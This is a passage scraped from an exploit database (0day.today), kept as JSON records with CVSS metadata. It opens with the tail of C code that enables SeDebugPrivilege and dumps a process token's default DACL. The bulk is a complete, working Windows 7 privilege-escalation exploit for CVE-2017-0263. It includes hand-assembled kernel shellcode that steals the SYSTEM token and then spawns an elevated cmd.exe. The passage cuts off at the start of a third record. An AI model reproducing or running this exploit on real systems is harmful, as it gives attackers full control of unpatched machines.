FALSE to disable\r\n );\r\n \r\nvoid DisplayError(LPTSTR szAPI);\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes);\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n HANDLE hProcess;\r\n HANDLE hToken;\r\n int dwRetVal = RTN_OK; // assume success from main()\r\n \r\n // show correct usage for kill\r\n if (argc != 2)\r\n {\r\n fprintf(stderr, \"Usage: %s [ProcessId]\\n\", argv[0]);\r\n return RTN_USAGE;\r\n }\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken))\r\n {\r\n if (GetLastError() == ERROR_NO_TOKEN)\r\n {\r\n if (!ImpersonateSelf(SecurityImpersonation))\r\n return RTN_ERROR;\r\n \r\n if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)){\r\n DisplayError(L\"OpenThreadToken\");\r\n return RTN_ERROR;\r\n }\r\n }\r\n else\r\n return RTN_ERROR;\r\n }\r\n \r\n // enable SeDebugPrivilege\r\n if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE))\r\n {\r\n DisplayError(L\"SetPrivilege\");\r\n \r\n // close token handle\r\n CloseHandle(hToken);\r\n \r\n // indicate failure\r\n return RTN_ERROR;\r\n }\r\n \r\n CloseHandle(hToken);\r\n \r\n // open the process\r\n if ((hProcess = OpenProcess(\r\n PROCESS_QUERY_INFORMATION,\r\n FALSE,\r\n atoi(argv[1]) // PID from commandline\r\n )) == NULL)\r\n {\r\n DisplayError(L\"OpenProcess\");\r\n return RTN_ERROR;\r\n }\r\n \r\n // Open process token.\r\n if (!OpenProcessToken(hProcess, TOKEN_READ, &hToken)) {\r\n DisplayError(L\"OpenProcessToken\");\r\n return RTN_ERROR;\r\n }\r\n \r\n DWORD ReturnLength = 0;\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, NULL, 0, &ReturnLength) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) {\r\n DisplayError(L\"GetTokenInformation #1\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength);\r\n if (!GetTokenInformation(hToken, TokenDefaultDacl, OutputBuffer, ReturnLength, &ReturnLength)) {\r\n DisplayError(L\"GetTokenInformation 
#2\");\r\n return RTN_ERROR;\r\n }\r\n \r\n PrintHex(OutputBuffer, ReturnLength);\r\n \r\n // close handles\r\n HeapFree(GetProcessHeap(), 0, OutputBuffer);\r\n CloseHandle(hProcess);\r\n \r\n return dwRetVal;\r\n}\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. FALSE to disable\r\n )\r\n{\r\n TOKEN_PRIVILEGES tp;\r\n LUID luid;\r\n TOKEN_PRIVILEGES tpPrevious;\r\n DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);\r\n \r\n if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;\r\n \r\n // \r\n // first pass. get current privilege setting\r\n // \r\n tp.PrivilegeCount = 1;\r\n tp.Privileges[0].Luid = luid;\r\n tp.Privileges[0].Attributes = 0;\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tp,\r\n sizeof(TOKEN_PRIVILEGES),\r\n &tpPrevious,\r\n &cbPrevious\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n // \r\n // second pass. set privilege based on previous setting\r\n // \r\n tpPrevious.PrivilegeCount = 1;\r\n tpPrevious.Privileges[0].Luid = luid;\r\n \r\n if (bEnablePrivilege) {\r\n tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED);\r\n }\r\n else {\r\n tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED &\r\n tpPrevious.Privileges[0].Attributes);\r\n }\r\n \r\n AdjustTokenPrivileges(\r\n hToken,\r\n FALSE,\r\n &tpPrevious,\r\n cbPrevious,\r\n NULL,\r\n NULL\r\n );\r\n \r\n if (GetLastError() != ERROR_SUCCESS) return FALSE;\r\n \r\n return TRUE;\r\n}\r\n \r\nvoid DisplayError(\r\n LPTSTR szAPI // pointer to failed API name\r\n )\r\n{\r\n LPTSTR MessageBuffer;\r\n DWORD dwBufferLength;\r\n \r\n fwprintf(stderr, L\"%s() error!\\n\", szAPI);\r\n \r\n if (dwBufferLength = FormatMessage(\r\n FORMAT_MESSAGE_ALLOCATE_BUFFER |\r\n FORMAT_MESSAGE_FROM_SYSTEM,\r\n NULL,\r\n GetLastError(),\r\n GetSystemDefaultLangID(),\r\n (LPTSTR)&MessageBuffer,\r\n 0,\r\n NULL\r\n ))\r\n {\r\n DWORD 
dwBytesWritten;\r\n \r\n // \r\n // Output message string on stderr\r\n // \r\n WriteFile(\r\n GetStdHandle(STD_ERROR_HANDLE),\r\n MessageBuffer,\r\n dwBufferLength,\r\n &dwBytesWritten,\r\n NULL\r\n );\r\n \r\n // \r\n // free the buffer allocated by the system\r\n // \r\n LocalFree(MessageBuffer);\r\n }\r\n}\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/27776", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-18T02:33:50", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-04-17T00:00:00", "type": "zdt", "title": "Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0263"], "modified": "2018-04-17T00:00:00", "id": "1337DAY-ID-30198", "href": "https://0day.today/exploit/description/30198", "sourceData": "#include <Windows.h>\r\n#include <wingdi.h>\r\n#include <iostream>\r\n#include <Psapi.h>\r\n#pragma comment(lib, \"psapi.lib\")\r\n \r\n#define POCDEBUG 0\r\n \r\n#if POCDEBUG == 1\r\n#define POCDEBUG_BREAK() getchar()\r\n#elif POCDEBUG == 2\r\n#define POCDEBUG_BREAK() DebugBreak()\r\n#else\r\n#define POCDEBUG_BREAK()\r\n#endif\r\n \r\nstatic PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;\r\n \r\nstatic constexpr UINT num_PopupMenuCount = 2;\r\nstatic constexpr UINT num_WndShadowCount = 
3;\r\nstatic constexpr UINT num_NtUserMNDragLeave = 0x11EC;\r\nstatic constexpr UINT num_offset_WND_pcls = 0x64;\r\n \r\nstatic HMENU hpopupMenu[num_PopupMenuCount] = { 0 };\r\nstatic UINT iMenuCreated = 0;\r\nstatic BOOL bDoneExploit = FALSE;\r\nstatic DWORD popupMenuRoot = 0;\r\nstatic HWND hWindowMain = NULL;\r\nstatic HWND hWindowHunt = NULL;\r\nstatic HWND hWindowList[0x100] = { 0 };\r\nstatic UINT iWindowCount = 0;\r\nstatic PVOID pvHeadFake = NULL;\r\nstatic PVOID pvAddrFlags = NULL;\r\n \r\ntypedef struct _HEAD {\r\n HANDLE h;\r\n DWORD cLockObj;\r\n} HEAD, *PHEAD;\r\n \r\ntypedef struct _THROBJHEAD {\r\n HEAD head;\r\n PVOID pti;\r\n} THROBJHEAD, *PTHROBJHEAD;\r\n \r\ntypedef struct _DESKHEAD {\r\n PVOID rpdesk;\r\n PBYTE pSelf;\r\n} DESKHEAD, *PDESKHEAD;\r\n \r\ntypedef struct _THRDESKHEAD {\r\n THROBJHEAD thread;\r\n DESKHEAD deskhead;\r\n} THRDESKHEAD, *PTHRDESKHEAD;\r\n \r\ntypedef struct _SHELLCODE {\r\n DWORD reserved;\r\n DWORD pid;\r\n DWORD off_CLS_lpszMenuName;\r\n DWORD off_THREADINFO_ppi;\r\n DWORD off_EPROCESS_ActiveLink;\r\n DWORD off_EPROCESS_Token;\r\n PVOID tagCLS[0x100];\r\n BYTE pfnWindProc[];\r\n} SHELLCODE, *PSHELLCODE;\r\n \r\nstatic PSHELLCODE pvShellCode = NULL;\r\n \r\n// Arguments:\r\n// [ebp+08h]:pwnd = pwndWindowHunt;\r\n// [ebp+0Ch]:msg = 0x9F9F;\r\n// [ebp+10h]:wParam = popupMenuRoot;\r\n// [ebp+14h]:lParam = NULL;\r\n// In kernel-mode, the first argument is tagWND pwnd.\r\nstatic\r\nBYTE\r\nxxPayloadWindProc[] = {\r\n // Loader+0x108a:\r\n // Judge if the `msg` is 0x9f9f value.\r\n 0x55, // push ebp\r\n 0x8b, 0xec, // mov ebp,esp\r\n 0x8b, 0x45, 0x0c, // mov eax,dword ptr [ebp+0Ch]\r\n 0x3d, 0x9f, 0x9f, 0x00, 0x00, // cmp eax,9F9Fh\r\n 0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne Loader+0x1128\r\n // Loader+0x109b:\r\n // Judge if CS is 0x1b, which means in user-mode context.\r\n 0x66, 0x8c, 0xc8, // mov ax,cs\r\n 0x66, 0x83, 0xf8, 0x1b, // cmp ax,1Bh\r\n 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je Loader+0x1128\r\n // 
Loader+0x10a8:\r\n // Get the address of pwndWindowHunt to ECX.\r\n // Recover the flags of pwndWindowHunt: zero bServerSideWindowProc.\r\n // Get the address of pvShellCode to EDX by CALL-POP.\r\n // Get the address of pvShellCode->tagCLS[0x100] to ESI.\r\n // Get the address of popupMenuRoot to EDI.\r\n 0xfc, // cld\r\n 0x8b, 0x4d, 0x08, // mov ecx,dword ptr [ebp+8]\r\n 0xff, 0x41, 0x16, // inc dword ptr [ecx+16h]\r\n 0x60, // pushad\r\n 0xe8, 0x00, 0x00, 0x00, 0x00, // call $5\r\n 0x5a, // pop edx\r\n 0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub edx,443h\r\n 0xbb, 0x00, 0x01, 0x00, 0x00, // mov ebx,100h\r\n 0x8d, 0x72, 0x18, // lea esi,[edx+18h]\r\n 0x8b, 0x7d, 0x10, // mov edi,dword ptr [ebp+10h]\r\n // Loader+0x10c7:\r\n 0x85, 0xdb, // test ebx,ebx\r\n 0x74, 0x13, // je Loader+0x10de\r\n // Loader+0x10cb:\r\n // Judge if pvShellCode->tagCLS[ebx] == NULL\r\n 0xad, // lods dword ptr [esi]\r\n 0x4b, // dec ebx\r\n 0x83, 0xf8, 0x00, // cmp eax,0\r\n 0x74, 0xf5, // je Loader+0x10c7\r\n // Loader+0x10d2:\r\n // Judge if tagCLS->lpszMenuName == popupMenuRoot\r\n 0x03, 0x42, 0x08, // add eax,dword ptr [edx+8]\r\n 0x39, 0x38, // cmp dword ptr [eax],edi\r\n 0x75, 0xee, // jne Loader+0x10c7\r\n // Loader+0x10d9:\r\n // Zero tagCLS->lpszMenuName\r\n 0x83, 0x20, 0x00, // and dword ptr [eax],0\r\n 0xeb, 0xe9, // jmp Loader+0x10c7\r\n // Loader+0x10de:\r\n // Get the value of pwndWindowHunt->head.pti->ppi->Process to ECX.\r\n // Get the value of pvShellCode->pid to EAX.\r\n 0x8b, 0x49, 0x08, // mov ecx,dword ptr [ecx+8]\r\n 0x8b, 0x5a, 0x0c, // mov ebx,dword ptr [edx+0Ch]\r\n 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]\r\n 0x8b, 0x09, // mov ecx,dword ptr [ecx]\r\n 0x8b, 0x5a, 0x10, // mov ebx,dword ptr [edx+10h]\r\n 0x8b, 0x42, 0x04, // mov eax,dword ptr [edx+4]\r\n 0x51, // push ecx\r\n // Loader+0x10f0:\r\n // Judge if EPROCESS->UniqueId == pid.\r\n 0x39, 0x44, 0x0b, 0xfc, // cmp dword ptr [ebx+ecx-4],eax\r\n 0x74, 0x07, // je Loader+0x10fd\r\n // Loader+0x10f6:\r\n // 
Get next EPROCESS to ECX by ActiveLink.\r\n 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]\r\n 0x2b, 0xcb, // sub ecx,ebx\r\n 0xeb, 0xf3, // jmp Loader+0x10f0\r\n // Loader+0x10fd:\r\n // Get current EPROCESS to EDI.\r\n 0x8b, 0xf9, // mov edi,ecx\r\n 0x59, // pop ecx\r\n // Loader+0x1100:\r\n // Judge if EPROCESS->UniqueId == 4\r\n 0x83, 0x7c, 0x0b, 0xfc, 0x04, // cmp dword ptr [ebx+ecx-4],4\r\n 0x74, 0x07, // je Loader+0x110e\r\n // Loader+0x1107:\r\n // Get next EPROCESS to ECX by ActiveLink.\r\n 0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]\r\n 0x2b, 0xcb, // sub ecx,ebx\r\n 0xeb, 0xf2, // jmp Loader+0x1100\r\n // Loader+0x110e:\r\n // Get system EPROCESS to ESI.\r\n // Get the value of system EPROCESS->Token to current EPROCESS->Token.\r\n // Add 2 to OBJECT_HEADER->PointerCount of system Token.\r\n // Return 0x9F9F to the caller.\r\n 0x8b, 0xf1, // mov esi,ecx\r\n 0x8b, 0x42, 0x14, // mov eax,dword ptr [edx+14h]\r\n 0x03, 0xf0, // add esi,eax\r\n 0x03, 0xf8, // add edi,eax\r\n 0xad, // lods dword ptr [esi]\r\n 0xab, // stos dword ptr es:[edi]\r\n 0x83, 0xe0, 0xf8, // and eax,0FFFFFFF8h\r\n 0x83, 0x40, 0xe8, 0x02, // add dword ptr [eax-18h],2\r\n 0x61, // popad\r\n 0xb8, 0x9f, 0x9f, 0x00, 0x00, // mov eax,9F9Fh\r\n 0xeb, 0x05, // jmp Loader+0x112d\r\n // Loader+0x1128:\r\n // Failed in processing.\r\n 0xb8, 0x01, 0x00, 0x00, 0x00, // mov eax,1\r\n // Loader+0x112d:\r\n 0xc9, // leave\r\n 0xc2, 0x10, 0x00, // ret 10h\r\n};\r\n \r\nstatic\r\nVOID\r\nxxGetHMValidateHandle(VOID)\r\n{\r\n HMODULE hModule = LoadLibraryA(\"USER32.DLL\");\r\n PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, \"IsMenu\");\r\n PBYTE Address = NULL;\r\n for (INT i = 0; i < 0x30; i++)\r\n {\r\n if (*(WORD *)(i + pfnIsMenu) != 0x02B2)\r\n {\r\n continue;\r\n }\r\n i += 2;\r\n if (*(BYTE *)(i + pfnIsMenu) != 0xE8)\r\n {\r\n continue;\r\n }\r\n Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;\r\n Address = Address + i + 5;\r\n pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, 
BYTE))Address;\r\n break;\r\n }\r\n}\r\n \r\n#define TYPE_WINDOW 1\r\n \r\nstatic\r\nPVOID\r\nxxHMValidateHandleEx(HWND hwnd)\r\n{\r\n return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);\r\n}\r\n \r\nstatic\r\nPVOID\r\nxxHMValidateHandle(HWND hwnd)\r\n{\r\n PVOID RetAddr = NULL;\r\n if (!pfnHMValidateHandle)\r\n {\r\n xxGetHMValidateHandle();\r\n }\r\n if (pfnHMValidateHandle)\r\n {\r\n RetAddr = xxHMValidateHandleEx(hwnd);\r\n }\r\n return RetAddr;\r\n}\r\n \r\nstatic\r\nULONG_PTR\r\nxxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2)\r\n{\r\n __asm { mov eax, num };\r\n __asm { int 2eh };\r\n}\r\n \r\nstatic\r\nLRESULT\r\nWINAPI\r\nxxShadowWindowProc(\r\n _In_ HWND hwnd,\r\n _In_ UINT msg,\r\n _In_ WPARAM wParam,\r\n _In_ LPARAM lParam\r\n)\r\n{\r\n if (msg != WM_NCDESTROY || bDoneExploit)\r\n {\r\n return DefWindowProcW(hwnd, msg, wParam, lParam);\r\n }\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n POCDEBUG_BREAK();\r\n DWORD dwPopupFake[0xD] = { 0 };\r\n dwPopupFake[0x0] = (DWORD)0x00098208; //->flags\r\n dwPopupFake[0x1] = (DWORD)pvHeadFake; //->spwndNotify\r\n dwPopupFake[0x2] = (DWORD)pvHeadFake; //->spwndPopupMenu\r\n dwPopupFake[0x3] = (DWORD)pvHeadFake; //->spwndNextPopup\r\n dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup\r\n dwPopupFake[0x5] = (DWORD)pvHeadFake; //->spmenu\r\n dwPopupFake[0x6] = (DWORD)pvHeadFake; //->spmenuAlternate\r\n dwPopupFake[0x7] = (DWORD)pvHeadFake; //->spwndActivePopup\r\n dwPopupFake[0x8] = (DWORD)0xFFFFFFFF; //->ppopupmenuRoot\r\n dwPopupFake[0x9] = (DWORD)pvHeadFake; //->ppmDelayedFree\r\n dwPopupFake[0xA] = (DWORD)0xFFFFFFFF; //->posSelectedItem\r\n dwPopupFake[0xB] = (DWORD)pvHeadFake; //->posDropped\r\n dwPopupFake[0xC] = (DWORD)0;\r\n for (UINT i = 0; i < iWindowCount; ++i)\r\n {\r\n SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake);\r\n }\r\n xxSyscall(num_NtUserMNDragLeave, 0, 0);\r\n LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0);\r\n bDoneExploit 
= Triggered == 0x9F9F;\r\n return DefWindowProcW(hwnd, msg, wParam, lParam);\r\n}\r\n \r\n#define MENUCLASS_NAME L\"#32768\"\r\n \r\nstatic\r\nLRESULT\r\nCALLBACK\r\nxxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)\r\n{\r\n tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;\r\n static HWND hwndMenuHit = 0;\r\n static UINT iShadowCount = 0;\r\n \r\n if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE)\r\n {\r\n return CallNextHookEx(0, code, wParam, lParam);\r\n }\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n WCHAR szTemp[0x20] = { 0 };\r\n GetClassNameW(cwp->hwnd, szTemp, 0x14);\r\n if (!wcscmp(szTemp, L\"SysShadow\") && hwndMenuHit != NULL)\r\n {\r\n std::cout << \"::iShadowCount=\" << iShadowCount << std::endl;\r\n POCDEBUG_BREAK();\r\n if (++iShadowCount == num_WndShadowCount)\r\n {\r\n SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc);\r\n }\r\n else\r\n {\r\n SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW);\r\n SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW);\r\n }\r\n }\r\n else if (!wcscmp(szTemp, MENUCLASS_NAME))\r\n {\r\n hwndMenuHit = cwp->hwnd;\r\n std::cout << \"::hwndMenuHit=\" << hwndMenuHit << std::endl;\r\n }\r\n return CallNextHookEx(0, code, wParam, lParam);\r\n}\r\n \r\n#define MN_ENDMENU 0x1F3\r\n \r\nstatic\r\nVOID\r\nCALLBACK\r\nxxWindowEventProc(\r\n HWINEVENTHOOK hWinEventHook,\r\n DWORD event,\r\n HWND hwnd,\r\n LONG idObject,\r\n LONG idChild,\r\n DWORD idEventThread,\r\n DWORD dwmsEventTime\r\n)\r\n{\r\n UNREFERENCED_PARAMETER(hWinEventHook);\r\n UNREFERENCED_PARAMETER(event);\r\n UNREFERENCED_PARAMETER(idObject);\r\n UNREFERENCED_PARAMETER(idChild);\r\n UNREFERENCED_PARAMETER(idEventThread);\r\n UNREFERENCED_PARAMETER(dwmsEventTime);\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n if (iMenuCreated == 0)\r\n {\r\n popupMenuRoot = *(DWORD 
*)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0);\r\n }\r\n if (++iMenuCreated >= num_PopupMenuCount)\r\n {\r\n std::cout << \">>SendMessage(MN_ENDMENU)\" << std::endl;\r\n POCDEBUG_BREAK();\r\n SendMessageW(hwnd, MN_ENDMENU, 0, 0);\r\n }\r\n else\r\n {\r\n std::cout << \">>SendMessage(WM_LBUTTONDOWN)\" << std::endl;\r\n POCDEBUG_BREAK();\r\n SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002);\r\n }\r\n}\r\n \r\nstatic\r\nBOOL\r\nxxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra)\r\n{\r\n WNDCLASSEXW wndClass = { 0 };\r\n wndClass = { 0 };\r\n wndClass.cbSize = sizeof(WNDCLASSEXW);\r\n wndClass.lpfnWndProc = DefWindowProcW;\r\n wndClass.cbWndExtra = cbWndExtra;\r\n wndClass.hInstance = GetModuleHandleA(NULL);\r\n wndClass.lpszMenuName = NULL;\r\n wndClass.lpszClassName = lpszClassName;\r\n return RegisterClassExW(&wndClass);\r\n}\r\n \r\nstatic\r\nHWND\r\nxxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle)\r\n{\r\n return CreateWindowExW(dwExStyle,\r\n lpszClassName,\r\n NULL,\r\n dwStyle,\r\n 0,\r\n 0,\r\n 1,\r\n 1,\r\n NULL,\r\n NULL,\r\n GetModuleHandleA(NULL),\r\n NULL);\r\n}\r\n \r\nstatic\r\nVOID xxCreateCmdLineProcess(VOID)\r\n{\r\n STARTUPINFO si = { sizeof(si) };\r\n PROCESS_INFORMATION pi = { 0 };\r\n si.dwFlags = STARTF_USESHOWWINDOW;\r\n si.wShowWindow = SW_SHOW;\r\n WCHAR wzFilePath[MAX_PATH] = { L\"cmd.exe\" };\r\n BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);\r\n if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);\r\n}\r\n \r\nstatic\r\nDWORD\r\nWINAPI\r\nxxTrackExploitEx(LPVOID lpThreadParameter)\r\n{\r\n UNREFERENCED_PARAMETER(lpThreadParameter);\r\n std::cout << \"::\" << __FUNCTION__ << std::endl;\r\n POCDEBUG_BREAK();\r\n \r\n for (INT i = 0; i < num_PopupMenuCount; i++)\r\n {\r\n MENUINFO mi = { 0 };\r\n hpopupMenu[i] = CreatePopupMenu();\r\n mi.cbSize = sizeof(mi);\r\n mi.fMask = MIM_STYLE;\r\n mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | 
MNS_DRAGDROP;\r\n SetMenuInfo(hpopupMenu[i], &mi);\r\n }\r\n for (INT i = 0; i < num_PopupMenuCount; i++)\r\n {\r\n LPCSTR szMenuItem = \"item\";\r\n AppendMenuA(hpopupMenu[i],\r\n MF_BYPOSITION | MF_POPUP,\r\n (i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1],\r\n szMenuItem);\r\n }\r\n \r\n for (INT i = 0; i < 0x100; i++)\r\n {\r\n WNDCLASSEXW Class = { 0 };\r\n WCHAR szTemp[20] = { 0 };\r\n HWND hwnd = NULL;\r\n wsprintfW(szTemp, L\"%x-%d\", rand(), i);\r\n Class.cbSize = sizeof(WNDCLASSEXA);\r\n Class.lpfnWndProc = DefWindowProcW;\r\n Class.cbWndExtra = 0;\r\n Class.hInstance = GetModuleHandleA(NULL);\r\n Class.lpszMenuName = NULL;\r\n Class.lpszClassName = szTemp;\r\n if (!RegisterClassExW(&Class))\r\n {\r\n continue;\r\n }\r\n hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED,\r\n 0,\r\n 0,\r\n 0,\r\n 0,\r\n NULL,\r\n NULL,\r\n GetModuleHandleA(NULL),\r\n NULL);\r\n if (hwnd == NULL)\r\n {\r\n continue;\r\n }\r\n hWindowList[iWindowCount++] = hwnd;\r\n }\r\n for (INT i = 0; i < iWindowCount; i++)\r\n {\r\n pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls);\r\n }\r\n \r\n DWORD fOldProtect = 0;\r\n VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect);\r\n \r\n xxRegisterWindowClassW(L\"WNDCLASSMAIN\", 0x000);\r\n hWindowMain = xxCreateWindowExW(L\"WNDCLASSMAIN\",\r\n WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,\r\n WS_VISIBLE);\r\n xxRegisterWindowClassW(L\"WNDCLASSHUNT\", 0x200);\r\n hWindowHunt = xxCreateWindowExW(L\"WNDCLASSHUNT\",\r\n WS_EX_LEFT,\r\n WS_OVERLAPPED);\r\n PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);\r\n PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4;\r\n pvHeadFake = pbExtra + 0x44;\r\n for (UINT x = 0; x < 0x7F; x++)\r\n {\r\n SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra);\r\n }\r\n PVOID pti = head->thread.pti;\r\n SetWindowLongW(hWindowHunt, 0x28, 0);\r\n SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // 
pti\r\n SetWindowLongW(hWindowHunt, 0x6C, 0);\r\n SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033);\r\n SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF);\r\n \r\n pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16;\r\n \r\n SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc);\r\n \r\n SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc,\r\n GetModuleHandleA(NULL),\r\n GetCurrentThreadId());\r\n \r\n SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,\r\n GetModuleHandleA(NULL),\r\n xxWindowEventProc,\r\n GetCurrentProcessId(),\r\n GetCurrentThreadId(),\r\n 0);\r\n \r\n TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL);\r\n \r\n MSG msg = { 0 };\r\n while (GetMessageW(&msg, NULL, 0, 0))\r\n {\r\n TranslateMessage(&msg);\r\n DispatchMessageW(&msg);\r\n }\r\n return 0;\r\n}\r\n \r\nINT POC_CVE20170263(VOID)\r\n{\r\n std::cout << \"-------------------\" << std::endl;\r\n std::cout << \"POC - CVE-2017-0263\" << std::endl;\r\n std::cout << \"-------------------\" << std::endl;\r\n \r\n pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n if (pvShellCode == NULL)\r\n {\r\n return 0;\r\n }\r\n ZeroMemory(pvShellCode, 0x1000);\r\n pvShellCode->pid = GetCurrentProcessId();\r\n pvShellCode->off_CLS_lpszMenuName = 0x050;\r\n pvShellCode->off_THREADINFO_ppi = 0x0b8;\r\n pvShellCode->off_EPROCESS_ActiveLink = 0x0b8;\r\n pvShellCode->off_EPROCESS_Token = 0x0f8;\r\n CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc));\r\n \r\n std::cout << \"CREATE WORKER THREAD...\" << std::endl;\r\n POCDEBUG_BREAK();\r\n HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL);\r\n if (hThread == NULL)\r\n {\r\n return FALSE;\r\n }\r\n while (!bDoneExploit)\r\n {\r\n Sleep(500);\r\n }\r\n xxCreateCmdLineProcess();\r\n DestroyWindow(hWindowMain);\r\n TerminateThread(hThread, 0);\r\n std::cout << \"-------------------\" << 
std::endl;\r\n getchar();\r\n return bDoneExploit;\r\n}\r\n \r\nINT main(INT argc, CHAR *argv[])\r\n{\r\n POC_CVE20170263();\r\n return 0;\r\n}\n\n# 0day.today [2018-04-18] #", "sourceHref": "https://0day.today/exploit/30198", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-05T05:13:31", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation Explo", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0214"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27797", "href": "https://0day.today/exploit/description/27797", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n \r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n 